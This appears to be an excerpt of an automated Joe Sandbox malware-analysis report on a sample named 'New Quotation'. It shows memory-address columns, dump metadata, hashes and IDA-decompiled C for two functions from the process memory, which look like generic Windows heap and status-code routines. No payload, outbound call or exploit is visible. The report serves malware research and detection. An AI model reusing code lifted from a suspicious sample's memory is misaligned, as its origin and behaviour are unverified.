                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f8dbe
                                                                                                                                                                                          0x1d7f8f0f
                                                                                                                                                                                          0x1d7f8dae
                                                                                                                                                                                          0x1d7f8dae
                                                                                                                                                                                          0x1d7f8db1
                                                                                                                                                                                          0x1d7f8db3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f8db3
                                                                                                                                                                                          0x1d7f8d48
                                                                                                                                                                                          0x1d7f8d48
                                                                                                                                                                                          0x1d7f8d4b
                                                                                                                                                                                          0x1d7f8d4f
                                                                                                                                                                                          0x1d7f8d51
                                                                                                                                                                                          0x1d7f8d51
                                                                                                                                                                                          0x1d7f8d54
                                                                                                                                                                                          0x1d7f8d57
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f8d59
                                                                                                                                                                                          0x1d7f8d5c
                                                                                                                                                                                          0x1d7f8d94
                                                                                                                                                                                          0x1d7f8d98
                                                                                                                                                                                          0x1d7f8d99
                                                                                                                                                                                          0x1d7f8d9f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f8d9f
                                                                                                                                                                                          0x1d7f8d6e
                                                                                                                                                                                          0x1d7f8d70
                                                                                                                                                                                          0x1d7f8d72
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f8d78
                                                                                                                                                                                          0x1d7f8d7a
                                                                                                                                                                                          0x1d7f8d7c
                                                                                                                                                                                          0x1d7f8d7c
                                                                                                                                                                                          0x1d7f8d7c
                                                                                                                                                                                          0x1d7f8d7f
                                                                                                                                                                                          0x1d7f8d82
                                                                                                                                                                                          0x1d7f8d85
                                                                                                                                                                                          0x1d7f8d88
                                                                                                                                                                                          0x1d7f8d8b
                                                                                                                                                                                          0x1d7f8d8e
                                                                                                                                                                                          0x1d83d0f1
                                                                                                                                                                                          0x1d83d0f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f8d8e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f8d22
                                                                                                                                                                                          0x1d7f8d25
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f8d27

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1985be67d4cc6ea4cd4c22285889ec8a312717f6cdff1dbdf3b06a31c8484f60
                                                                                                                                                                                          • Instruction ID: 24132324c1078f8e005666f6c6462b6e5b8687e48f888327162df083783d1923
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1985be67d4cc6ea4cd4c22285889ec8a312717f6cdff1dbdf3b06a31c8484f60
                                                                                                                                                                                          • Instruction Fuzzy Hash: 642281B0E0026A9FCB19CF99C4805BEF7F6BF48711B15805AE859AB341E738DD41CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7F4955 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E1D7F4955(signed int __eax, signed int __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, unsigned int _a16, unsigned int _a20, intOrPtr _a24, char _a28) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				unsigned int _v36;
				unsigned int _v40;
				signed char _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				unsigned int _v72;
				intOrPtr _v76;
				char _v80;
				unsigned int _v84;
				char _v88;
				signed int _t159;
				void* _t160;
				intOrPtr _t161;
				intOrPtr _t163;
				unsigned int _t164;
				intOrPtr _t166;
				signed int _t168;
				unsigned int _t204;
				intOrPtr _t214;
				intOrPtr _t216;
				signed char _t217;
				signed int _t241;
				signed char _t242;
				signed short _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				unsigned int _t247;
				intOrPtr _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				signed int _t253;
				signed int _t256;
				intOrPtr _t259;
				signed int _t261;
				signed int _t263;
				intOrPtr _t264;
				signed int _t266;
				intOrPtr _t268;
				void* _t272;
				signed int _t273;
				intOrPtr _t285;
				signed int _t293;
				signed int _t294;
				intOrPtr _t300;
				void* _t302;
				signed int _t304;
				signed int _t305;
				intOrPtr _t306;

				_v44 = __ecx;
				_t159 = __eax | 0xffffffff;
				_v88 = 0;
				_t300 = __edx;
				_v84 = 0;
				_t272 = _a4;
				_v68 = 0;
				_v60 = 0;
				_v16 = _t159;
				_v24 = _t159;
				_v20 = _t159;
				_v64 = 0;
				_v9 = 0;
				_v40 = 0;
				_v48 = 0;
				if(_t272 == 0) {
					L99:
					_t160 = 0xc000000d;
					L55:
					return _t160;
				}
				_t161 =  *_t272;
				if(_t161 == 0 || __edx == 0 ||  *((intOrPtr*)(_t161 + 4)) > 0) {
					goto L99;
				} else {
					_t247 = 0;
					_t241 = __ecx & 0x00010000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) == 0) {
						_t163 = 0;
					} else {
						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0xfbc))));
					}
					if(_t163 == 0) {
						_t164 = _t247;
					} else {
						_t164 =  *(_t163 + 0x20);
					}
					_v72 = _t164;
					_v32 = _t272;
					if(_t241 != 0 || (_t164 & 0x00000006) == 0) {
						L12:
						_v36 = _t247;
						_t166 = E1D7E5D90(_t247,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x154);
						_v40 = _t166;
						if(_t166 == 0) {
							_t160 = 0xc0000017;
							goto L55;
						}
						if(_t241 != 0) {
							L15:
							_t273 = 0;
							if(_a12 != 0) {
								if(_t241 != 0) {
									goto L16;
								}
								_t245 = _a12;
								_t263 = 0;
								_v56 = 0;
								if(0 >=  *(_t245 + 4)) {
									goto L16;
								}
								_t305 = 0;
								_v52 = 0;
								do {
									_t290 =  *((intOrPtr*)(_t245 + 0x10)) + _t305;
									if(0 ==  *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x10)) + _t305))) {
										goto L84;
									}
									_t264 =  *((intOrPtr*)(_t245 + 0xc));
									_v76 = _v40;
									_v80 = 0xaa0000;
									if(_t264 == 0) {
										_t264 = _t300;
									}
									if(E1D7F4443(_t264, _t290,  &_v80) < 0) {
										L83:
										_t263 = _v56;
										goto L84;
									}
									_push(_t264);
									_t302 = E1D7F5497(_v32, _t300, 0,  &_v16, _v76);
									if(_t302 < 0) {
										goto L50;
									}
									_t305 = _v52;
									goto L83;
									L84:
									_t263 = _t263 + 1;
									_t305 = _t305 + 6;
									_v56 = _t263;
									_v52 = _t305;
								} while (_t263 < ( *(_t245 + 4) & 0x0000ffff));
								_t273 = 0;
							}
							L16:
							_t242 = _v44;
							_t168 = _t242 & 0x00000020;
							_v52 = _t168;
							if(_t168 == 0) {
								L36:
								_v88 = 0xaa0000;
								_v84 = _v40 + 0xaa;
								_t302 = E1D7F5DC0( &_v28, _t300);
								if(_t302 < 0) {
									goto L50;
								}
								_t303 = _v28;
								if(E1D7F4F40(_v28 & 0x0000ffff,  &_v88) == 0) {
									_t302 = 0xc0000001;
									goto L50;
								}
								_t249 = _t300;
								_t302 = E1D7F5004(_t249, _t303, 1,  &_v20);
								if(_t302 < 0) {
									goto L50;
								}
								_t243 = _v20;
								if((_t242 & 0x00000040) != 0) {
									L44:
									if(_v9 == 0) {
										goto L50;
									}
									_t250 = _v32;
									if(_t250 == 0) {
										goto L50;
									}
									_t251 =  *_t250;
									_t302 = E1D7F62E9(_t251, _t300, _v72 >> 0x00000002 & 1, _v68, _a4);
									if(_t302 >= 0 && (_v44 & 0x00000030) == 0x30) {
										_push(_t251);
										_t302 = E1D7F5497(_a4, _t300, 0,  &_v24, _v84);
										if(_t302 < 0) {
											goto L50;
										}
										_t253 = _t243 * 0x1c;
										_t278 =  *((intOrPtr*)( *((intOrPtr*)(_t300 + 0x14)) + 0xc)) + _t253;
										if(( *( *((intOrPtr*)( *((intOrPtr*)(_t300 + 0x14)) + 0xc)) + _t253) & 0x00000006) != 0) {
											if(_v36 == 0) {
												L96:
												_t195 =  *((intOrPtr*)(_t300 + 0x1c));
												L97:
												_push(_t253);
												_t302 = E1D871889(_a4, _t278, _t300, _t195);
												goto L50;
											}
											_t195 = _v48;
											if(_v48 != 0) {
												goto L97;
											}
											goto L96;
										}
									}
									goto L50;
								}
								if(_a28 != 0) {
									if(_v60 > 0) {
										goto L44;
									}
								}
								_push(_t249);
								_t302 = E1D7F5497(_v32, _t300, 0,  &_v24, _v84);
								if(_t302 >= 0 && _v52 != 0) {
									_t256 = _t243 * 0x1c;
									_t281 =  *((intOrPtr*)( *((intOrPtr*)(_t300 + 0x14)) + 0xc)) + _t256;
									if(( *( *((intOrPtr*)( *((intOrPtr*)(_t300 + 0x14)) + 0xc)) + _t256) & 0x00000006) != 0) {
										if(_v36 == 0) {
											L91:
											_t202 =  *((intOrPtr*)(_t300 + 0x1c));
											L92:
											_push(_t256);
											_t302 = E1D871889(_v32, _t281, _t300, _t202);
											if(_t302 < 0) {
												goto L50;
											}
											goto L44;
										}
										_t202 = _v48;
										if(_v48 != 0) {
											goto L92;
										}
										goto L91;
									}
								}
								goto L44;
							}
							_t204 = _a16;
							if(_t204 == 0 ||  *((intOrPtr*)(_t204 + 4)) <= _t273) {
								_t204 = _a20;
								if(_t204 == 0 ||  *((intOrPtr*)(_t204 + 4)) <= _t273) {
									goto L36;
								} else {
									goto L21;
								}
							} else {
								L21:
								_v36 = _t204;
								if( *((char*)(_t204 + 8)) == 0) {
									_t244 = _a24;
									_v48 = _t244;
									if(_t244 != 0) {
										L24:
										_v56 = _t273;
										if(0 >=  *((intOrPtr*)(_t204 + 4))) {
											L35:
											_t242 = _v44;
											goto L36;
										}
										_t304 = _t273;
										while(1) {
											_t283 =  *((intOrPtr*)(_t204 + 0x10)) + _t304;
											if(0 ==  *((intOrPtr*)( *((intOrPtr*)(_t204 + 0x10)) + _t304))) {
												goto L34;
											}
											_t259 = _t300;
											_v76 = _v40;
											_v80 = 0xaa0000;
											if(E1D7F4443(_t259, _t283,  &_v80) < 0) {
												goto L34;
											}
											_push(_t259);
											if(E1D7F5497(_v32, _t300, 1,  &_v16, _v76) >= 0 && (_v44 & 0x00000010) != 0) {
												_t214 =  *((intOrPtr*)(_v36 + 0x10));
												if( *((short*)(_t304 + _t214)) != 2) {
													goto L34;
												}
												_t261 =  *(_t304 + _t214 + 4) * 0x1c;
												_t216 =  *((intOrPtr*)(_t300 + 0x14));
												_t288 =  *((intOrPtr*)(_t216 + 0xc)) + _t261;
												_t217 =  *( *((intOrPtr*)(_t216 + 0xc)) + _t261) & 0x0000ffff;
												if((_t217 & 0x00000007) == 0) {
													goto L34;
												}
												if((_t217 & 0x00000006) != 0) {
													_push(_t261);
													if(E1D871889(_v32, _t288, _t300, _t244) < 0) {
														goto L34;
													}
												}
												_v60 = _v60 + 1;
											}
											L34:
											_t304 = _t304 + 6;
											_t285 = _v56 + 1;
											_v56 = _t285;
											if(_t285 < ( *(_v36 + 4) & 0x0000ffff)) {
												_t204 = _v36;
												continue;
											}
											goto L35;
										}
									}
									_t244 =  *((intOrPtr*)(_t300 + 0x20));
									L23:
									_v48 = _t244;
									goto L24;
								}
								_t244 =  *((intOrPtr*)(_t300 + 0x1c));
								goto L23;
							}
						}
						_t306 = _a8;
						if(_t306 != 0) {
							_t266 = 0;
							_v52 = 0;
							if(0 >=  *(_t306 + 4)) {
								goto L15;
							}
							_v56 = 0;
							do {
								_t229 =  *((intOrPtr*)(_t306 + 0x10)) + _t266;
								_t293 = _v52;
								if(0 ==  *((intOrPtr*)( *((intOrPtr*)(_t306 + 0x10)) + _t266))) {
									goto L72;
								}
								_v76 = _v40;
								_t268 =  *((intOrPtr*)(_t306 + 0xc));
								_v80 = 0xaa0000;
								if(_t268 == 0) {
									_t268 = _t300;
								}
								if(E1D7F4443(_t268, _t229,  &_v80) < 0) {
									L71:
									_t293 = _v52;
									_t266 = _v56;
								} else {
									_push(_t268);
									_t302 = E1D7F5497(_v32, _t300, 0,  &_v16, _v76);
									if(_t302 < 0) {
										goto L50;
									}
									_t306 = _a8;
									goto L71;
								}
								L72:
								_t294 = _t293 + 1;
								_t266 = _t266 + 6;
								_v52 = _t294;
								_v56 = _t266;
							} while (_t294 < ( *(_t306 + 4) & 0x0000ffff));
						}
						goto L15;
					} else {
						_v68 = _t164 >> 0x10;
						_v9 = 1;
						_v32 =  &_v64;
						_t302 = E1D7F2D66(_t300, 0x19, _t247);
						if(_t302 < 0) {
							L50:
							_t248 = _v64;
							if(_v64 != 0) {
								E1D7F332D(_t248);
							}
							_t173 = _v40;
							if(_v40 != 0) {
								E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t173);
							}
							_t160 = _t302;
							goto L55;
						}
						_t247 = 0;
						goto L12;
					}
				}
			}





























































                                                                                                                                                                                          0x1d7f4960
                                                                                                                                                                                          0x1d7f4964
                                                                                                                                                                                          0x1d7f4967
                                                                                                                                                                                          0x1d7f496b
                                                                                                                                                                                          0x1d7f496d
                                                                                                                                                                                          0x1d7f4970
                                                                                                                                                                                          0x1d7f4973
                                                                                                                                                                                          0x1d7f4976
                                                                                                                                                                                          0x1d7f4979
                                                                                                                                                                                          0x1d7f497d
                                                                                                                                                                                          0x1d7f4981
                                                                                                                                                                                          0x1d7f4985
                                                                                                                                                                                          0x1d7f4988
                                                                                                                                                                                          0x1d7f498b
                                                                                                                                                                                          0x1d7f498e
                                                                                                                                                                                          0x1d7f4993
                                                                                                                                                                                          0x1d83b73f
                                                                                                                                                                                          0x1d83b73f
                                                                                                                                                                                          0x1d7f4c7a
                                                                                                                                                                                          0x1d7f4c7e
                                                                                                                                                                                          0x1d7f4c7e
                                                                                                                                                                                          0x1d7f4999
                                                                                                                                                                                          0x1d7f499d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f49b5
                                                                                                                                                                                          0x1d7f49bd
                                                                                                                                                                                          0x1d7f49bf
                                                                                                                                                                                          0x1d7f49cb
                                                                                                                                                                                          0x1d83b59e
                                                                                                                                                                                          0x1d7f49d1
                                                                                                                                                                                          0x1d7f49dd
                                                                                                                                                                                          0x1d7f49dd
                                                                                                                                                                                          0x1d7f49e1
                                                                                                                                                                                          0x1d83b5a5
                                                                                                                                                                                          0x1d7f49e7
                                                                                                                                                                                          0x1d7f49e7
                                                                                                                                                                                          0x1d7f49e7
                                                                                                                                                                                          0x1d7f49ea
                                                                                                                                                                                          0x1d7f49ed
                                                                                                                                                                                          0x1d7f49f2
                                                                                                                                                                                          0x1d7f4a20
                                                                                                                                                                                          0x1d7f4a2d
                                                                                                                                                                                          0x1d7f4a33
                                                                                                                                                                                          0x1d7f4a38
                                                                                                                                                                                          0x1d7f4a3d
                                                                                                                                                                                          0x1d83b5ac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b5ac
                                                                                                                                                                                          0x1d7f4a45
                                                                                                                                                                                          0x1d7f4a52
                                                                                                                                                                                          0x1d7f4a52
                                                                                                                                                                                          0x1d7f4a57
                                                                                                                                                                                          0x1d83b63e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b644
                                                                                                                                                                                          0x1d83b649
                                                                                                                                                                                          0x1d83b64b
                                                                                                                                                                                          0x1d83b652
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b658
                                                                                                                                                                                          0x1d83b65a
                                                                                                                                                                                          0x1d83b65d
                                                                                                                                                                                          0x1d83b662
                                                                                                                                                                                          0x1d83b667
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b669
                                                                                                                                                                                          0x1d83b66f
                                                                                                                                                                                          0x1d83b672
                                                                                                                                                                                          0x1d83b67b
                                                                                                                                                                                          0x1d83b67d
                                                                                                                                                                                          0x1d83b67d
                                                                                                                                                                                          0x1d83b68a
                                                                                                                                                                                          0x1d83b6ad
                                                                                                                                                                                          0x1d83b6ad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b6ad
                                                                                                                                                                                          0x1d83b68c
                                                                                                                                                                                          0x1d83b6a0
                                                                                                                                                                                          0x1d83b6a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b6aa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b6b0
                                                                                                                                                                                          0x1d83b6b4
                                                                                                                                                                                          0x1d83b6b5
                                                                                                                                                                                          0x1d83b6b8
                                                                                                                                                                                          0x1d83b6bb
                                                                                                                                                                                          0x1d83b6be
                                                                                                                                                                                          0x1d83b6c2
                                                                                                                                                                                          0x1d83b6c2
                                                                                                                                                                                          0x1d7f4a5d
                                                                                                                                                                                          0x1d7f4a5d
                                                                                                                                                                                          0x1d7f4a62
                                                                                                                                                                                          0x1d7f4a65
                                                                                                                                                                                          0x1d7f4a68
                                                                                                                                                                                          0x1d7f4b45
                                                                                                                                                                                          0x1d7f4b4d
                                                                                                                                                                                          0x1d7f4b54
                                                                                                                                                                                          0x1d7f4b61
                                                                                                                                                                                          0x1d7f4b65
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4b6b
                                                                                                                                                                                          0x1d7f4b7e
                                                                                                                                                                                          0x1d83b735
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b735
                                                                                                                                                                                          0x1d7f4b8d
                                                                                                                                                                                          0x1d7f4b94
                                                                                                                                                                                          0x1d7f4b98
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4ba1
                                                                                                                                                                                          0x1d7f4ba5
                                                                                                                                                                                          0x1d7f4be9
                                                                                                                                                                                          0x1d7f4bed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4bef
                                                                                                                                                                                          0x1d7f4bf4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4c01
                                                                                                                                                                                          0x1d7f4c11
                                                                                                                                                                                          0x1d7f4c15
                                                                                                                                                                                          0x1d7f4c21
                                                                                                                                                                                          0x1d7f4c36
                                                                                                                                                                                          0x1d7f4c3a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4c3f
                                                                                                                                                                                          0x1d7f4c48
                                                                                                                                                                                          0x1d7f4c4d
                                                                                                                                                                                          0x1d83b717
                                                                                                                                                                                          0x1d83b720
                                                                                                                                                                                          0x1d83b720
                                                                                                                                                                                          0x1d83b723
                                                                                                                                                                                          0x1d83b723
                                                                                                                                                                                          0x1d83b72e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b72e
                                                                                                                                                                                          0x1d83b719
                                                                                                                                                                                          0x1d83b71e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b71e
                                                                                                                                                                                          0x1d7f4c4d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4c15
                                                                                                                                                                                          0x1d7f4bab
                                                                                                                                                                                          0x1d7f4c85
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4c8b
                                                                                                                                                                                          0x1d7f4bb1
                                                                                                                                                                                          0x1d7f4bc6
                                                                                                                                                                                          0x1d7f4bca
                                                                                                                                                                                          0x1d7f4bd5
                                                                                                                                                                                          0x1d7f4bde
                                                                                                                                                                                          0x1d7f4be3
                                                                                                                                                                                          0x1d83b6ed
                                                                                                                                                                                          0x1d83b6f6
                                                                                                                                                                                          0x1d83b6f6
                                                                                                                                                                                          0x1d83b6f9
                                                                                                                                                                                          0x1d83b6f9
                                                                                                                                                                                          0x1d83b704
                                                                                                                                                                                          0x1d83b708
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b70e
                                                                                                                                                                                          0x1d83b6ef
                                                                                                                                                                                          0x1d83b6f4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b6f4
                                                                                                                                                                                          0x1d7f4be3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4bca
                                                                                                                                                                                          0x1d7f4a6e
                                                                                                                                                                                          0x1d7f4a73
                                                                                                                                                                                          0x1d7f4a7b
                                                                                                                                                                                          0x1d7f4a80
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4a90
                                                                                                                                                                                          0x1d7f4a90
                                                                                                                                                                                          0x1d7f4a94
                                                                                                                                                                                          0x1d7f4a97
                                                                                                                                                                                          0x1d7f4c90
                                                                                                                                                                                          0x1d7f4c93
                                                                                                                                                                                          0x1d7f4c98
                                                                                                                                                                                          0x1d7f4aa3
                                                                                                                                                                                          0x1d7f4aa5
                                                                                                                                                                                          0x1d7f4aac
                                                                                                                                                                                          0x1d7f4b42
                                                                                                                                                                                          0x1d7f4b42
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4b42
                                                                                                                                                                                          0x1d7f4ab2
                                                                                                                                                                                          0x1d7f4ab4
                                                                                                                                                                                          0x1d7f4ab9
                                                                                                                                                                                          0x1d7f4abe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4ac3
                                                                                                                                                                                          0x1d7f4ac5
                                                                                                                                                                                          0x1d7f4acc
                                                                                                                                                                                          0x1d7f4ada
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4adc
                                                                                                                                                                                          0x1d7f4af2
                                                                                                                                                                                          0x1d7f4afd
                                                                                                                                                                                          0x1d7f4b05
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4b0c
                                                                                                                                                                                          0x1d7f4b0f
                                                                                                                                                                                          0x1d7f4b15
                                                                                                                                                                                          0x1d7f4b17
                                                                                                                                                                                          0x1d7f4b1c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4b20
                                                                                                                                                                                          0x1d83b6d1
                                                                                                                                                                                          0x1d83b6de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b6e4
                                                                                                                                                                                          0x1d7f4b26
                                                                                                                                                                                          0x1d7f4b26
                                                                                                                                                                                          0x1d7f4b29
                                                                                                                                                                                          0x1d7f4b2c
                                                                                                                                                                                          0x1d7f4b32
                                                                                                                                                                                          0x1d7f4b33
                                                                                                                                                                                          0x1d7f4b3c
                                                                                                                                                                                          0x1d83b6c9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b6c9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4b3c
                                                                                                                                                                                          0x1d7f4ab4
                                                                                                                                                                                          0x1d7f4c9e
                                                                                                                                                                                          0x1d7f4aa0
                                                                                                                                                                                          0x1d7f4aa0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4aa0
                                                                                                                                                                                          0x1d7f4a9d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4a9d
                                                                                                                                                                                          0x1d7f4a73
                                                                                                                                                                                          0x1d7f4a47
                                                                                                                                                                                          0x1d7f4a4c
                                                                                                                                                                                          0x1d83b5b6
                                                                                                                                                                                          0x1d83b5ba
                                                                                                                                                                                          0x1d83b5c1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b5c7
                                                                                                                                                                                          0x1d83b5ca
                                                                                                                                                                                          0x1d83b5cf
                                                                                                                                                                                          0x1d83b5d4
                                                                                                                                                                                          0x1d83b5d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b5dc
                                                                                                                                                                                          0x1d83b5df
                                                                                                                                                                                          0x1d83b5e2
                                                                                                                                                                                          0x1d83b5eb
                                                                                                                                                                                          0x1d83b5ed
                                                                                                                                                                                          0x1d83b5ed
                                                                                                                                                                                          0x1d83b5fc
                                                                                                                                                                                          0x1d83b61f
                                                                                                                                                                                          0x1d83b61f
                                                                                                                                                                                          0x1d83b622
                                                                                                                                                                                          0x1d83b5fe
                                                                                                                                                                                          0x1d83b5fe
                                                                                                                                                                                          0x1d83b612
                                                                                                                                                                                          0x1d83b616
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b61c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83b61c
                                                                                                                                                                                          0x1d83b625
                                                                                                                                                                                          0x1d83b629
                                                                                                                                                                                          0x1d83b62a
                                                                                                                                                                                          0x1d83b62d
                                                                                                                                                                                          0x1d83b630
                                                                                                                                                                                          0x1d83b633
                                                                                                                                                                                          0x1d83b637
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f49f8
                                                                                                                                                                                          0x1d7f49fd
                                                                                                                                                                                          0x1d7f4a08
                                                                                                                                                                                          0x1d7f4a0c
                                                                                                                                                                                          0x1d7f4a14
                                                                                                                                                                                          0x1d7f4a18
                                                                                                                                                                                          0x1d7f4c53
                                                                                                                                                                                          0x1d7f4c53
                                                                                                                                                                                          0x1d7f4c58
                                                                                                                                                                                          0x1d7f4c5a
                                                                                                                                                                                          0x1d7f4c5a
                                                                                                                                                                                          0x1d7f4c5f
                                                                                                                                                                                          0x1d7f4c64
                                                                                                                                                                                          0x1d7f4c73
                                                                                                                                                                                          0x1d7f4c73
                                                                                                                                                                                          0x1d7f4c78
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4c78
                                                                                                                                                                                          0x1d7f4a1e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f4a1e
                                                                                                                                                                                          0x1d7f49f2

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 404bdb3069237242736c87285a47880b8af0925a3db27f9dc6d0c918b918b8ae
                                                                                                                                                                                          • Instruction ID: 947cfb39c66c10a939878cf2534debf75a1c7b1ab8f29f98116346032c110a8c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 404bdb3069237242736c87285a47880b8af0925a3db27f9dc6d0c918b918b8ae
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15F1A675E0420A9BCB25CF95D880BBEB7F5BF44714F05812AE929AB351E734E841CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7DF870 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                          			E1D7DF870(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, signed int* _a24) {
				signed short _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				signed short _v36;
				signed short _v40;
				signed int* _v44;
				signed short _v48;
				signed short _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed short* _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t156;
				signed int _t161;
				intOrPtr _t163;
				signed int _t164;
				signed short _t166;
				signed int _t168;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				intOrPtr _t179;
				signed int _t181;
				signed int _t187;
				signed short _t189;
				signed short _t191;
				signed int _t198;
				signed short _t211;
				signed short _t213;
				signed int _t217;
				signed short _t225;
				signed int _t228;
